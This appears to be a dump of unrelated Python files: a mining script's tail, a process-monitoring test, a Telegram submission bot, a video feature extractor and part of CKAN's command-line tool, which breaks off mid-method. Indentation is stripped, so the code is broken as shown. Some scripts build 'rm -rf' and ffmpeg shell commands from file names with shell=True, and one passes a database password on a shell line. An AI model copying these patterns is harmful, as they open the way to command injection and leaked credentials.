time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
process_task.py
|
#!/usr/bin/env python
#coding:utf-8
"""
Author: --<v1ll4n>
Purpose: process_task for a task(ProcessMode)
Created: 2016/12/12
"""
import unittest
import time
import multiprocessing
import threading
from multiprocessing import Pipe
from pprint import pprint
import exceptions
def sleep_(num):
#pprint("~~~")
time.sleep(num)
#----------------------------------------------------------------------
def testfun(num):
""""""
#print('UserFunc called!')
for i in range(6):
threading.Thread(target=sleep_, args=(num,)).start()
#print('SubProcess Called!')
time.sleep(0.4)
#pprint(threading.enumerate())
########################################################################
class ProcessTask(multiprocessing.Process):
""""""
#----------------------------------------------------------------------
def __init__(self, id, target, args=tuple(), kwargs={}, status_monitor_pipe=None,
threads_update_interval=0.0):
"""Constructor"""
multiprocessing.Process.__init__(self, name=id)
self._target = target
self.args = args
self.kwargs = kwargs
self._id = id
self._sub_threads_list = []
self._threads_update_interval = threads_update_interval
self._status_monitor_pipe = status_monitor_pipe
#self._init_timer()
#----------------------------------------------------------------------
def _init_timer(self):
""""""
self._threads_monitor = threading.Thread(name='update_subthreads_list',
target=self._deamon_check_threads)
self._threads_monitor.daemon = True
self._threads_monitor.start()
#----------------------------------------------------------------------
@property
def task_id(self):
""""""
return self._id
#----------------------------------------------------------------------
def run(self):
""""""
self._init_timer()
try:
self._target(*self.args, **self.kwargs)
except exceptions.TaskRuntimeError:
raise NotImplemented
#----------------------------------------------------------------------
def _enum_threads(self):
""""""
threads_list = threading.enumerate()
return threads_list
#----------------------------------------------------------------------
def _deamon_check_threads(self):
""""""
assert isinstance(self._threads_update_interval, (int, float))
while True:
#pprint('test')
self._sub_threads_list = None
self._sub_threads_list = self._enum_threads()
#print(len(self._sub_threads_list))
#print len(self._sub_threads_list)
threads_check_result = {}
threads_check_result['from'] = self._id
for i in self._sub_threads_list:
threads_check_result[i.name] = i.is_alive()
#pprint(threads_check_result)
self._status_monitor_pipe.send(threads_check_result)
time.sleep(self._threads_update_interval)
##----------------------------------------------------------------------
#@property
#def subthreads_count(self):
#return len(self._sub_threads_list)
########################################################################
class ProcessTaskTest(unittest.case.TestCase):
""""""
#----------------------------------------------------------------------
def print_bar(self):
""""""
print('-'*64)
#----------------------------------------------------------------------
def print_end_bar(self):
""""""
print('-'*30 + 'END' + '-'*31)
#----------------------------------------------------------------------
def runTest(self):
""""""
pipp, pipc = Pipe()
self.print_bar()
print('Test Task Interface')
ret_process = ProcessTask(id='test-1', target=testfun, args=(5,),
status_monitor_pipe=pipc)
ret_process.start()
print('Test get threads status')
time.sleep(1)
#print(ret_process.subthreads_count)
threads_status = pipp.recv()
self.assertIsInstance(threads_status, dict)
self.print_end_bar()
if __name__ == '__main__':
unittest.main()
|
main.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import json
import telegram.ext
import telegram
import sys
import datetime
import os
import logging
import threading
reload(sys)
sys.setdefaultencoding('utf8')
Version_Code = 'v1.0.0'
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'
)
PATH = os.path.dirname(os.path.realpath(__file__)) + '/'
CONFIG = json.loads(open(PATH + 'config.json', 'r').read())
DATA_LOCK = False
submission_list = json.loads(open(PATH + 'data.json', 'r').read())
def save_data():
global DATA_LOCK
while DATA_LOCK:
time.sleep(0.05)
DATA_LOCK = True
f = open(PATH + 'data.json', 'w')
f.write(json.dumps(submission_list, ensure_ascii=False))
f.close()
DATA_LOCK = False
def save_config():
f = open(PATH + 'config.json', 'w')
f.write(json.dumps(CONFIG, indent=4))
f.close()
updater = telegram.ext.Updater(token=CONFIG['Token'])
dispatcher = updater.dispatcher
me = updater.bot.get_me()
CONFIG['ID'] = me.id
CONFIG['Username'] = '@' + me.username
print 'Starting... (ID: ' + str(CONFIG['ID']) + ', Username: ' \
+ CONFIG['Username'] + ')'
def process_msg(bot, update):
if update.channel_post != None:
return
if update.message.chat_id == CONFIG['Group_ID'] \
and update.message.reply_to_message != None:
if update.message.reply_to_message.from_user.id == CONFIG['ID'] \
and (update.message.reply_to_message.forward_from != None
or update.message.reply_to_message.forward_from_chat
!= None):
msg = update.message.reply_to_message
global submission_list
if submission_list[str(CONFIG['Group_ID']) + ':'
+ str(msg.message_id)]['posted'] == True:
return
if update.message.text != None:
# 稿件未通过
bot.edit_message_text(text="新投稿\n投稿人: ["
+ submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_Name']
+ '](tg://user?id='
+ str(submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_ID'])
+ """)
来源: 保留
审稿人: [""" + update.message.from_user.name
+ '](tg://user?id=' + str(update.message.from_user.id)
+ ")\n投稿被拒绝,理由:\n"+update.message.text, chat_id=CONFIG['Group_ID'],
parse_mode=telegram.ParseMode.MARKDOWN,
message_id=submission_list[str(CONFIG['Group_ID'
]) + ':' + str(msg.message_id)]['Markup_ID'])
bot.send_message(chat_id=submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_ID'],
text='管理员:'+update.message.text,
reply_to_message_id=submission_list[str(CONFIG['Group_ID'
]) + ':' + str(msg.message_id)]['Original_MsgID'])
return
if update.message.from_user.id == update.message.chat_id:
markup = \
telegram.InlineKeyboardMarkup([[telegram.InlineKeyboardButton("是"
, callback_data='submission_type:real'),
telegram.InlineKeyboardButton("否",
callback_data='submission_type:anonymous')],
[telegram.InlineKeyboardButton("取消投稿",
callback_data='cancel:submission')]])
if update.message.forward_from != None \
or update.message.forward_from_chat != None:
if update.message.forward_from_chat != None:
markup = \
telegram.InlineKeyboardMarkup([[telegram.InlineKeyboardButton("是"
, callback_data='submission_type:real')],
[telegram.InlineKeyboardButton("取消投稿",
callback_data='cancel:submission')]])
elif update.message.forward_from.id \
!= update.message.from_user.id:
markup = \
telegram.InlineKeyboardMarkup([[telegram.InlineKeyboardButton("是"
, callback_data='submission_type:real')],
[telegram.InlineKeyboardButton("取消投稿",
callback_data='cancel:submission')]])
bot.send_message(chat_id=update.message.chat_id,
text="即将完成投稿...\n您是否想要保留消息来源(保留消息发送者用户名)",
reply_to_message_id=update.message.message_id,
reply_markup=markup)
def process_command(bot, update):
if update.channel_post != None:
return
command = update.message.text[1:].replace(CONFIG['Username'], ''
).lower()
if command == 'start':
bot.send_message(chat_id=update.message.chat_id,
text="""可接收的投稿类型:
文字
图片
音频/语音
视频
文件""")
return
if command == 'version':
bot.send_message(chat_id=update.message.chat_id,
text='Telegram Submission Bot\n'
+ Version_Code
+ '\nhttps://github.com/Netrvin/telegram-submission-bot'
)
return
if update.message.from_user.id == CONFIG['Admin']:
if command == 'setgroup':
CONFIG['Group_ID'] = update.message.chat_id
save_config()
bot.send_message(chat_id=update.message.chat_id,
text="已设置本群为审稿群")
return
def anonymous_post(bot, msg, editor):
if msg.audio != None:
r = bot.send_audio(chat_id=CONFIG['Publish_Channel_ID'],
audio=msg.audio, caption=msg.caption)
elif msg.document != None:
r = bot.send_document(chat_id=CONFIG['Publish_Channel_ID'],
document=msg.document,
caption=msg.caption)
elif msg.voice != None:
r = bot.send_voice(chat_id=CONFIG['Publish_Channel_ID'],
voice=msg.voice, caption=msg.caption)
elif msg.video != None:
r = bot.send_video(chat_id=CONFIG['Publish_Channel_ID'],
video=msg.video, caption=msg.caption)
elif msg.photo:
r = bot.send_photo(chat_id=CONFIG['Publish_Channel_ID'],
photo=msg.photo[0], caption=msg.caption)
else:
r = bot.send_message(chat_id=CONFIG['Publish_Channel_ID'],
text=msg.text_markdown,
parse_mode=telegram.ParseMode.MARKDOWN)
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(msg.message_id)]['posted'] = True
bot.edit_message_text(text="新投稿\n投稿人: ["
+ submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_Name']
+ '](tg://user?id='
+ str(submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_ID'])
+ """)
来源: 保留
审稿人: [""" + editor.name
+ '](tg://user?id=' + str(editor.id)
+ ")\n已采用", chat_id=CONFIG['Group_ID'],
parse_mode=telegram.ParseMode.MARKDOWN,
message_id=submission_list[str(CONFIG['Group_ID'
]) + ':' + str(msg.message_id)]['Markup_ID'])
bot.send_message(chat_id=submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_ID'],
text="您的稿件已过审,感谢您对我们的支持",
reply_to_message_id=submission_list[str(CONFIG['Group_ID'
]) + ':' + str(msg.message_id)]['Original_MsgID'])
threading.Thread(target=save_data).start()
return r
def real_name_post(bot, msg, editor):
global submission_list
r = bot.forward_message(chat_id=CONFIG['Publish_Channel_ID'],
from_chat_id=CONFIG['Group_ID'],
message_id=msg.message_id)
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(msg.message_id)]['posted'] = True
bot.edit_message_text(text="新投稿\n投稿人: ["
+ submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_Name']
+ '](tg://user?id='
+ str(submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_ID'])
+ """)
来源: 保留
审稿人: [""" + editor.name
+ '](tg://user?id=' + str(editor.id)
+ ")\n已采用", chat_id=CONFIG['Group_ID'],
parse_mode=telegram.ParseMode.MARKDOWN,
message_id=submission_list[str(CONFIG['Group_ID'
]) + ':' + str(msg.message_id)]['Markup_ID'])
bot.send_message(chat_id=submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_ID'],
text="您的稿件已过审,感谢您对我们的支持",
reply_to_message_id=submission_list[str(CONFIG['Group_ID'
]) + ':' + str(msg.message_id)]['Original_MsgID'])
threading.Thread(target=save_data).start()
return r
def process_callback(bot, update):
if update.channel_post != None:
return
global submission_list
query = update.callback_query
if query.message.chat_id == CONFIG['Group_ID'] and query.data \
== 'receive:real':
real_name_post(bot, query.message.reply_to_message,
query.from_user)
return
if query.message.chat_id == CONFIG['Group_ID'] and query.data \
== 'receive:anonymous':
anonymous_post(bot, query.message.reply_to_message,
query.from_user)
return
if query.data == 'cancel:submission':
bot.edit_message_text(text="已取消投稿",
chat_id=query.message.chat_id,
message_id=query.message.message_id)
return
msg = "新投稿\n投稿人: [" + query.message.reply_to_message.from_user.name \
+ '](tg://user?id=' \
+ str(query.message.reply_to_message.from_user.id) + ")\n拒绝投稿请直接回复以上信息,可多次回复\n\n来源: "
fwd_msg = bot.forward_message(chat_id=CONFIG['Group_ID'],
from_chat_id=query.message.chat_id,
message_id=query.message.reply_to_message.message_id)
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)] = {}
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['posted'] = False
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['Sender_Name'] = \
query.message.reply_to_message.from_user.name
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['Sender_ID'] = \
query.message.reply_to_message.from_user.id
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['Original_MsgID'] = \
query.message.reply_to_message.message_id
if query.data == 'submission_type:real':
msg += "保留"
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['type'] = 'real'
markup = \
telegram.InlineKeyboardMarkup([[telegram.InlineKeyboardButton("采用"
, callback_data='receive:real')]])
markup_msg = bot.send_message(chat_id=CONFIG['Group_ID'],
text=msg, reply_to_message_id=fwd_msg.message_id,
reply_markup=markup,
parse_mode=telegram.ParseMode.MARKDOWN)
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['Markup_ID'] = \
markup_msg.message_id
elif query.data == 'submission_type:anonymous':
msg += "匿名"
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['type'] = 'anonymous'
markup = \
telegram.InlineKeyboardMarkup([[telegram.InlineKeyboardButton("采用"
, callback_data='receive:anonymous')]])
markup_msg = bot.send_message(chat_id=CONFIG['Group_ID'],
text=msg, reply_to_message_id=fwd_msg.message_id,
reply_markup=markup,
parse_mode=telegram.ParseMode.MARKDOWN)
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['Markup_ID'] = \
markup_msg.message_id
bot.edit_message_text(text="感谢您的投稿", chat_id=query.message.chat_id,
message_id=query.message.message_id)
threading.Thread(target=save_data).start()
dispatcher.add_handler(telegram.ext.MessageHandler(telegram.ext.Filters.text
| telegram.ext.Filters.audio
| telegram.ext.Filters.photo
| telegram.ext.Filters.video
| telegram.ext.Filters.voice
| telegram.ext.Filters.document, process_msg))
dispatcher.add_handler(telegram.ext.MessageHandler(telegram.ext.Filters.command,
process_command))
dispatcher.add_handler(telegram.ext.CallbackQueryHandler(process_callback))
updater.start_polling()
print 'Started'
updater.idle()
print 'Stopping...'
save_data()
print 'Data saved.'
print 'Stopped.'
|
extract_feat2.py
|
import torch.multiprocessing as mp
import pickle
import os
import sys
import re
import json
import subprocess
import numpy as np
import torch
from time import time, sleep
from torch import nn
import argparse
from model import generate_model
from mean import get_mean
from classify2 import classify_video
from torch.multiprocessing import Process, Queue, set_start_method
try:
set_start_method('spawn')
except RuntimeError:
pass
def parse_opts():
parser = argparse.ArgumentParser()
parser.add_argument('--input', default='input', type=str, help='Input file path')
parser.add_argument('--video_root', default='', type=str, help='Root path of input videos')
parser.add_argument('--model', default='', type=str, help='Model file path')
parser.add_argument('--output_root', default='./output', type=str, help='Output file path')
parser.add_argument('--mode', default='feature', type=str,
help='Mode (score | feature). score outputs class scores. feature outputs features (after global average pooling).')
parser.add_argument('--batch_size', default=32, type=int, help='Batch Size')
parser.add_argument('--n_threads', default=8, type=int,
help='Number of threads for multi-thread loading')
parser.add_argument('--model_name', default='resnext', type=str,
help='Currently only support resnet')
parser.add_argument('--model_depth', default=101, type=int,
help='Depth of resnet (10 | 18 | 34 | 50 | 101)')
parser.add_argument('--resnet_shortcut', default='B', type=str,
help='Shortcut type of resnet (A | B)')
parser.add_argument('--wide_resnet_k', default=2, type=int, help='Wide resnet k')
parser.add_argument('--resnext_cardinality', default=32, type=int, help='ResNeXt cardinality')
parser.add_argument('--no_cuda', action='store_true', help='If true, cuda is not used.')
parser.set_defaults(verbose=False)
args = parser.parse_args()
return args
# python extract_feat2.py --input ./input --video_root ./videos --output ./output --model ./PretrainedModels/resnext-101-kinetics.pth --resnet_shortcut B
class Video2frame_worker():
def __init__(self, class_names, queue, opt):
self.class_names = class_names
self.queue = queue
self.process = Process(target=self.ffmpeg, args=(queue, opt))
def ffmpeg(self, queue, opt):
for cls_name in self.class_names:
input_fns = os.listdir(os.path.join(opt.video_root, cls_name))
if not os.path.exists(os.path.join(opt.output_root, cls_name)):
os.mkdir(os.path.join(opt.output_root, cls_name))
outputs = []
for input_fn in input_fns:
input_fn = os.path.join(cls_name, input_fn)
# tmp_dir = 'tmp_' + input_fn.split('/')[-1]
tmp_dir = os.path.join('tmp', input_fn)
if os.path.exists(tmp_dir):
cmd = 'rm -rf ' + tmp_dir
subprocess.call(cmd, shell=True)
video_path = os.path.join(opt.video_root, input_fn)
if os.path.exists(video_path):
# 删除残余文件
if os.path.exists(tmp_dir):
subprocess.call('rm -rf ' + tmp_dir, shell=True)
# FFMPEG处理
t1 = time()
# cmd需要特殊处理' '
tmp_dir_cmd = tmp_dir.replace(' ', '\ ')
video_path = video_path.replace(' ', '\ ')
subprocess.call('mkdir -p ' + tmp_dir_cmd, shell=True)
cmd = 'ffmpeg -v 0 -i {} '.format(video_path) + tmp_dir_cmd + '/image_%05d.jpg'
print(cmd)
subprocess.call(cmd, shell=True)
print('FFMPEG processed for', time() - t1, 'seconds')
# 放入待处理队列
queue.put(tmp_dir)
else:
print('{} does not exist'.format(video_path))
class Extractor():
def __init__(self, opt, queue, device):
self.opt = opt
self.process = Process(target=self.Extract, args=(opt, queue, device))
def Extract(self, opt, queue, device):
model = generate_model(opt)
print('loading model {}'.format(opt.model))
# 转换model位置
device_id = int(device.split(':')[-1])
model = torch.nn.DataParallel(model, device_ids=[device_id])
model_data = torch.load(opt.model, map_location={'cuda:0': device})
assert opt.arch == model_data['arch']
model.load_state_dict(model_data['state_dict'])
model.to(device)
model.eval()
model.share_memory()
while True:
tmp_dir = queue.get()
# 以下2行,还原原始文件名。
input_fn = tmp_dir.split('_')[1:]
input_fn = '_'.join(input_fn)
# 以下2行,还原cls_name
print('1', tmp_dir)
match = re.search('/([\s\S]+)/', tmp_dir)
cls_name = match[1]
output_fn = opt.output_root + '/' + cls_name + '/' + input_fn + '.pickle'
print('Extracting', tmp_dir, 'to', output_fn)
# result is a dict
if not os.path.exists(output_fn):
result = classify_video(tmp_dir, input_fn, model, opt)
with open(output_fn, 'wb') as f:
# Pickle the 'data' dictionary using the highest protocol available.
pickle.dump(result, f, pickle.HIGHEST_PROTOCOL)
else:
print('feature already exists:', output_fn)
if os.path.exists(tmp_dir):
subprocess.call('rm -rf ' + tmp_dir.replace(' ', '\ '), shell=True)
if __name__ == "__main__":
opt = parse_opts()
opt.mean = get_mean()
opt.arch = '{}-{}'.format(opt.model_name, opt.model_depth)
opt.sample_size = 112
opt.sample_duration = 16
opt.n_classes = 400
# FFmpeg processed queue. a list of strings.
queue = Queue()
# Testing Code
class_names = os.listdir(opt.video_root)
t1 = len(class_names)//4
t2 = len(class_names)//2
t3 = len(class_names)//4 * 3
t4 = len(class_names)
class_names1 = class_names[:t1]
class_names2 = class_names[t1:t2]
class_names3 = class_names[t2:t3]
class_names4 = class_names[t3:t4]
ff1 = Video2frame_worker(class_names1, queue, opt)
ff2 = Video2frame_worker(class_names2, queue, opt)
ff3 = Video2frame_worker(class_names3, queue, opt)
ff4 = Video2frame_worker(class_names4, queue, opt)
ext4 = Extractor(opt, queue, device='cuda:3')
ext3 = Extractor(opt, queue, device='cuda:2')
ext2 = Extractor(opt, queue, device='cuda:1')
ext1 = Extractor(opt, queue, device='cuda:0')
ff1.process.start()
ff2.process.start()
ff3.process.start()
ff4.process.start()
ext4.process.start()
ext3.process.start()
ext2.process.start()
ext1.process.start()
ff1.process.join()
ff2.process.join()
ff3.process.join()
ff4.process.join()
ext4.process.join()
ext3.process.join()
ext2.process.join()
ext1.process.join()
|
cli.py
|
# encoding: utf-8
import collections
import csv
import multiprocessing as mp
import os
import datetime
import sys
from pprint import pprint
import re
import itertools
import json
import logging
import urlparse
from optparse import OptionConflictError
import sqlalchemy as sa
import routes
import paste.script
from paste.registry import Registry
from paste.script.util.logging_config import fileConfig
import ckan.logic as logic
import ckan.model as model
import ckan.include.rjsmin as rjsmin
import ckan.include.rcssmin as rcssmin
import ckan.lib.fanstatic_resources as fanstatic_resources
import ckan.plugins as p
from ckan.common import config
#NB No CKAN imports are allowed until after the config file is loaded.
# i.e. do the imports in methods, after _load_config is called.
# Otherwise loggers get disabled.
def deprecation_warning(message=None):
'''
Print a deprecation warning to STDERR.
If ``message`` is given it is also printed to STDERR.
'''
sys.stderr.write(u'WARNING: This function is deprecated.')
if message:
sys.stderr.write(u' ' + message.strip())
sys.stderr.write(u'\n')
def error(msg):
'''
Print an error message to STDOUT and exit with return code 1.
'''
sys.stderr.write(msg)
if not msg.endswith('\n'):
sys.stderr.write('\n')
sys.exit(1)
def parse_db_config(config_key='sqlalchemy.url'):
''' Takes a config key for a database connection url and parses it into
a dictionary. Expects a url like:
'postgres://tester:pass@localhost/ckantest3'
'''
from ckan.common import config
url = config[config_key]
regex = [
'^\s*(?P<db_type>\w*)',
'://',
'(?P<db_user>[^:]*)',
':?',
'(?P<db_pass>[^@]*)',
'@',
'(?P<db_host>[^/:]*)',
':?',
'(?P<db_port>[^/]*)',
'/',
'(?P<db_name>[\w.-]*)'
]
db_details_match = re.match(''.join(regex), url)
if not db_details_match:
raise Exception('Could not extract db details from url: %r' % url)
db_details = db_details_match.groupdict()
return db_details
## from http://code.activestate.com/recipes/577058/ MIT licence.
## Written by Trent Mick
def query_yes_no(question, default="yes"):
"""Ask a yes/no question via raw_input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is one of "yes" or "no".
"""
valid = {"yes": "yes", "y": "yes", "ye": "yes",
"no": "no", "n": "no"}
if default is None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while 1:
sys.stdout.write(question + prompt)
choice = raw_input().lower()
if default is not None and choice == '':
return default
elif choice in valid.keys():
return valid[choice]
else:
sys.stdout.write("Please respond with 'yes' or 'no' "\
"(or 'y' or 'n').\n")
class MockTranslator(object):
def gettext(self, value):
return value
def ugettext(self, value):
return value
def ungettext(self, singular, plural, n):
if n > 1:
return plural
return singular
class CkanCommand(paste.script.command.Command):
'''Base class for classes that implement CKAN paster commands to inherit.'''
parser = paste.script.command.Command.standard_parser(verbose=True)
parser.add_option('-c', '--config', dest='config',
default='development.ini', help='Config file to use.')
parser.add_option('-f', '--file',
action='store',
dest='file_path',
help="File to dump results to (if needed)")
default_verbosity = 1
group_name = 'ckan'
def _get_config(self):
from paste.deploy import appconfig
if self.options.config:
self.filename = os.path.abspath(self.options.config)
config_source = '-c parameter'
elif os.environ.get('CKAN_INI'):
self.filename = os.environ.get('CKAN_INI')
config_source = '$CKAN_INI'
else:
self.filename = os.path.join(os.getcwd(), 'development.ini')
config_source = 'default value'
if not os.path.exists(self.filename):
msg = 'Config file not found: %s' % self.filename
msg += '\n(Given by: %s)' % config_source
raise self.BadCommand(msg)
fileConfig(self.filename)
return appconfig('config:' + self.filename)
def _load_config(self, load_site_user=True):
conf = self._get_config()
assert 'ckan' not in dir() # otherwise loggers would be disabled
# We have now loaded the config. Now we can import ckan for the
# first time.
from ckan.config.environment import load_environment
load_environment(conf.global_conf, conf.local_conf)
self.registry = Registry()
self.registry.prepare()
import pylons
self.translator_obj = MockTranslator()
self.registry.register(pylons.translator, self.translator_obj)
if model.user_table.exists() and load_site_user:
# If the DB has already been initialized, create and register
# a pylons context object, and add the site user to it, so the
# auth works as in a normal web request
c = pylons.util.AttribSafeContextObj()
self.registry.register(pylons.c, c)
self.site_user = logic.get_action('get_site_user')({'ignore_auth': True}, {})
pylons.c.user = self.site_user['name']
pylons.c.userobj = model.User.get(self.site_user['name'])
## give routes enough information to run url_for
parsed = urlparse.urlparse(conf.get('ckan.site_url', 'http://0.0.0.0'))
request_config = routes.request_config()
request_config.host = parsed.netloc + parsed.path
request_config.protocol = parsed.scheme
def _setup_app(self):
cmd = paste.script.appinstall.SetupCommand('setup-app')
cmd.run([self.filename])
class ManageDb(CkanCommand):
'''Perform various tasks on the database.
db create - alias of db upgrade
db init - create and put in default data
db clean - clears db (including dropping tables) and
search index
db upgrade [version no.] - Data migrate
db version - returns current version of data schema
db dump FILE_PATH - dump to a pg_dump file [DEPRECATED]
db load FILE_PATH - load a pg_dump from a file [DEPRECATED]
db load-only FILE_PATH - load a pg_dump from a file but don\'t do
the schema upgrade or search indexing [DEPRECATED]
db create-from-model - create database from the model (indexes not made)
db migrate-filestore - migrate all uploaded data from the 2.1 filesore.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 1
def command(self):
cmd = self.args[0]
self._load_config(cmd!='upgrade')
import ckan.model as model
import ckan.lib.search as search
if cmd == 'init':
model.repo.init_db()
if self.verbose:
print 'Initialising DB: SUCCESS'
elif cmd == 'clean' or cmd == 'drop':
# remove any *.pyc version files to prevent conflicts
v_path = os.path.join(os.path.dirname(__file__),
'..', 'migration', 'versions', '*.pyc')
import glob
filelist = glob.glob(v_path)
for f in filelist:
os.remove(f)
model.repo.clean_db()
search.clear_all()
if self.verbose:
print 'Cleaning DB: SUCCESS'
elif cmd == 'upgrade':
if len(self.args) > 1:
model.repo.upgrade_db(self.args[1])
else:
model.repo.upgrade_db()
elif cmd == 'version':
self.version()
elif cmd == 'dump':
self.dump()
elif cmd == 'load':
self.load()
elif cmd == 'load-only':
self.load(only_load=True)
elif cmd == 'create-from-model':
model.repo.create_db()
if self.verbose:
print 'Creating DB: SUCCESS'
elif cmd == 'migrate-filestore':
self.migrate_filestore()
else:
error('Command %s not recognized' % cmd)
def _get_db_config(self):
return parse_db_config()
def _get_postgres_cmd(self, command):
self.db_details = self._get_db_config()
if self.db_details.get('db_type') not in ('postgres', 'postgresql'):
raise AssertionError('Expected postgres database - not %r' % self.db_details.get('db_type'))
pg_cmd = command
pg_cmd += ' -U %(db_user)s' % self.db_details
if self.db_details.get('db_pass') not in (None, ''):
pg_cmd = 'export PGPASSWORD=%(db_pass)s && ' % self.db_details + pg_cmd
if self.db_details.get('db_host') not in (None, ''):
pg_cmd += ' -h %(db_host)s' % self.db_details
if self.db_details.get('db_port') not in (None, ''):
pg_cmd += ' -p %(db_port)s' % self.db_details
return pg_cmd
def _get_psql_cmd(self):
psql_cmd = self._get_postgres_cmd('psql')
psql_cmd += ' -d %(db_name)s' % self.db_details
return psql_cmd
def _postgres_dump(self, filepath):
pg_dump_cmd = self._get_postgres_cmd('pg_dump')
pg_dump_cmd += ' %(db_name)s' % self.db_details
pg_dump_cmd += ' > %s' % filepath
self._run_cmd(pg_dump_cmd)
print 'Dumped database to: %s' % filepath
def _postgres_load(self, filepath):
import ckan.model as model
assert not model.repo.are_tables_created(), "Tables already found. You need to 'db clean' before a load."
pg_cmd = self._get_psql_cmd() + ' -f %s' % filepath
self._run_cmd(pg_cmd)
print 'Loaded CKAN database: %s' % filepath
def _run_cmd(self, command_line):
import subprocess
retcode = subprocess.call(command_line, shell=True)
if retcode != 0:
raise SystemError('Command exited with errorcode: %i' % retcode)
def dump(self):
deprecation_warning(u"Use PostgreSQL's pg_dump instead.")
if len(self.args) < 2:
print 'Need pg_dump filepath'
return
dump_path = self.args[1]
psql_cmd = self._get_psql_cmd() + ' -f %s'
pg_cmd = self._postgres_dump(dump_path)
def load(self, only_load=False):
deprecation_warning(u"Use PostgreSQL's pg_restore instead.")
if len(self.args) < 2:
print 'Need pg_dump filepath'
return
dump_path = self.args[1]
psql_cmd = self._get_psql_cmd() + ' -f %s'
pg_cmd = self._postgres_load(dump_path)
if not only_load:
print 'Upgrading DB'
import ckan.model as model
model.repo.upgrade_db()
print 'Rebuilding search index'
import ckan.lib.search
ckan.lib.search.rebuild()
else:
print 'Now remember you have to call \'db upgrade\' and then \'search-index rebuild\'.'
print 'Done'
def migrate_filestore(self):
from ckan.model import Session
import requests
from ckan.lib.uploader import ResourceUpload
results = Session.execute("select id, revision_id, url from resource "
"where resource_type = 'file.upload' "
"and (url_type <> 'upload' or url_type is null)"
"and url like '%storage%'")
for id, revision_id, url in results:
response = requests.get(url, stream=True)
if response.status_code != 200:
print "failed to fetch %s (code %s)" % (url,
response.status_code)
continue
resource_upload = ResourceUpload({'id': id})
assert resource_upload.storage_path, "no storage configured aborting"
directory = resource_upload.get_directory(id)
filepath = resource_upload.get_path(id)
try:
os.makedirs(directory)
except OSError, e:
## errno 17 is file already exists
if e.errno != 17:
raise
with open(filepath, 'wb+') as out:
for chunk in response.iter_content(1024):
if chunk:
out.write(chunk)
Session.execute("update resource set url_type = 'upload'"
"where id = :id", {'id': id})
Session.execute("update resource_revision set url_type = 'upload'"
"where id = :id and "
"revision_id = :revision_id",
{'id': id, 'revision_id': revision_id})
Session.commit()
print "Saved url %s" % url
def version(self):
from ckan.model import Session
print Session.execute('select version from migrate_version;').fetchall()
class SearchIndexCommand(CkanCommand):
'''Creates a search index for all datasets
Usage:
search-index [-i] [-o] [-r] [-e] [-q] rebuild [dataset_name] - reindex dataset_name if given, if not then rebuild
full search index (all datasets)
search-index rebuild_fast - reindex using multiprocessing using all cores.
This acts in the same way as rubuild -r [EXPERIMENTAL]
search-index check - checks for datasets not indexed
search-index show DATASET_NAME - shows index of a dataset
search-index clear [dataset_name] - clears the search index for the provided dataset or
for the whole ckan instance
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 0
def __init__(self, name):
super(SearchIndexCommand, self).__init__(name)
self.parser.add_option('-i', '--force', dest='force',
action='store_true', default=False,
help='Ignore exceptions when rebuilding the index')
self.parser.add_option('-o', '--only-missing', dest='only_missing',
action='store_true', default=False,
help='Index non indexed datasets only')
self.parser.add_option('-r', '--refresh', dest='refresh',
action='store_true', default=False,
help='Refresh current index (does not clear the existing one)')
self.parser.add_option('-q', '--quiet', dest='quiet',
action='store_true', default=False,
help='Do not output index rebuild progress')
self.parser.add_option('-e', '--commit-each', dest='commit_each',
action='store_true', default=False, help=
'''Perform a commit after indexing each dataset. This ensures that changes are
immediately available on the search, but slows significantly the process.
Default is false.''')
def command(self):
if not self.args:
# default to printing help
print self.usage
return
cmd = self.args[0]
# Do not run load_config yet
if cmd == 'rebuild_fast':
self.rebuild_fast()
return
self._load_config()
if cmd == 'rebuild':
self.rebuild()
elif cmd == 'check':
self.check()
elif cmd == 'show':
self.show()
elif cmd == 'clear':
self.clear()
else:
print 'Command %s not recognized' % cmd
def rebuild(self):
from ckan.lib.search import rebuild, commit
# BY default we don't commit after each request to Solr, as it is
# a really heavy operation and slows things a lot
if len(self.args) > 1:
rebuild(self.args[1])
else:
rebuild(only_missing=self.options.only_missing,
force=self.options.force,
refresh=self.options.refresh,
defer_commit=(not self.options.commit_each),
quiet=self.options.quiet)
if not self.options.commit_each:
